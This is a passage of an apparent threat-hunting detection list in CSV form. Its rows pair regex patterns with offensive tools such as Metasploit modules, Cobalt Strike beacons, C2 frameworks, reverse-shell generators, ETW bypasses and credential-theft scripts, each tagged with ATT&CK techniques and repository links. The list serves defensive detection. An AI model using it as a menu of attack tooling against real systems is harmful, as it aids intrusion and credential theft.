a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ftp-proftpd-backdoor.nse*",".{0,1000}\/ftp\-proftpd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ftp-syst.nse*",".{0,1000}\/ftp\-syst\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ftp-vsftpd-backdoor.nse*",".{0,1000}\/ftp\-vsftpd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ftp-vuln-cve2010-4221.nse*",".{0,1000}\/ftp\-vuln\-cve2010\-4221\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Fuck-Etw.git*",".{0,1000}\/Fuck\-Etw\.git.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*/FuckThatPacker*",".{0,1000}\/FuckThatPacker.{0,1000}","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","10","10","623","84","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" "*/FudgeC2*",".{0,1000}\/FudgeC2.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*/fuegoshell.git*",".{0,1000}\/fuegoshell\.git.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*/full-nelson.c*",".{0,1000}\/full\-nelson\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/full-nelson64*",".{0,1000}\/full\-nelson64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/FunctionalC2/*",".{0,1000}\/FunctionalC2\/.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","64","16","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*/fuzz.txt*",".{0,1000}\/fuzz\.txt.{0,1000}","offensive_tool_keyword","fuzz.txt","list of sensible files for fuzzing in system","T1210 - T1190 - T1203 - T1114","TA0002 - TA0003 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Bo0oM/fuzz.txt/blob/master/fuzz.txt","1","1","N/A","N/A","10","2790","473","2024-03-14T11:36:37Z","2016-01-19T13:35:44Z" "*/fuzzers/dns*",".{0,1000}\/fuzzers\/dns.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/fuzzers/ftp*",".{0,1000}\/fuzzers\/ftp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/fuzzers/http*",".{0,1000}\/fuzzers\/http.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/fuzzers/ntp*",".{0,1000}\/fuzzers\/ntp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/fuzzers/smb*",".{0,1000}\/fuzzers\/smb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/fuzzers/smtp*",".{0,1000}\/fuzzers\/smtp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/fuzzers/ssh*",".{0,1000}\/fuzzers\/ssh.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/FWUprank.ps1",".{0,1000}\/FWUprank\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/G0ldenGunSec/*",".{0,1000}\/G0ldenGunSec\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/GadgetToJScript.git*",".{0,1000}\/GadgetToJScript\.git.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","9","827","154","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*/gandcrab.profile*",".{0,1000}\/gandcrab\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/ganglia-info.nse*",".{0,1000}\/ganglia\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/gather/credentials*",".{0,1000}\/gather\/credentials.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/gather/forensics*",".{0,1000}\/gather\/forensics.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/gather/phish_windows_credentials*",".{0,1000}\/gather\/phish_windows_credentials.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*/gato/*attack.py*",".{0,1000}\/gato\/.{0,1000}attack\.py.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","1","N/A","N/A","5","446","43","2024-04-26T17:00:08Z","2023-01-06T15:43:27Z" "*/GC2-sheet/*",".{0,1000}\/GC2\-sheet\/.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","485","98","2024-04-01T15:33:47Z","2021-09-15T19:06:12Z" "*/gcat.git*",".{0,1000}\/gcat\.git.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1316","422","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "*/gcat.py",".{0,1000}\/gcat\.py","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1316","422","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "*/geacon.git*",".{0,1000}\/geacon\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*/geacon/*beacon*",".{0,1000}\/geacon\/.{0,1000}beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*/geacon_pro*",".{0,1000}\/geacon_pro.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*/Gemail-Hack.git*",".{0,1000}\/Gemail\-Hack\.git.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","10","929","368","2024-01-17T15:12:44Z","2018-04-19T13:48:41Z" "*/generate_bind_fuegoshell.ps1*",".{0,1000}\/generate_bind_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*/generate_reverse_fuegoshell.ps1*",".{0,1000}\/generate_reverse_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*/genHTA*",".{0,1000}\/genHTA.{0,1000}","offensive_tool_keyword","genHTA","Generates anti-sandbox analysis HTA files without payloads. anti-sandbox analysis HTA File Generator","T1564 - T1059 - T1027 - T1055","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/genHTA","1","0","N/A","N/A","1","15","3","2017-03-16T21:49:59Z","2017-06-12T10:58:35Z" "*/GetBrowsers.ps1*",".{0,1000}\/GetBrowsers\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/get-clipboard.py*",".{0,1000}\/get\-clipboard\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/get-desc-users.py*",".{0,1000}\/get\-desc\-users\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/Get-GPPPassword.ps1*",".{0,1000}\/Get\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Get-InfectedThread.ps1*",".{0,1000}\/Get\-InfectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 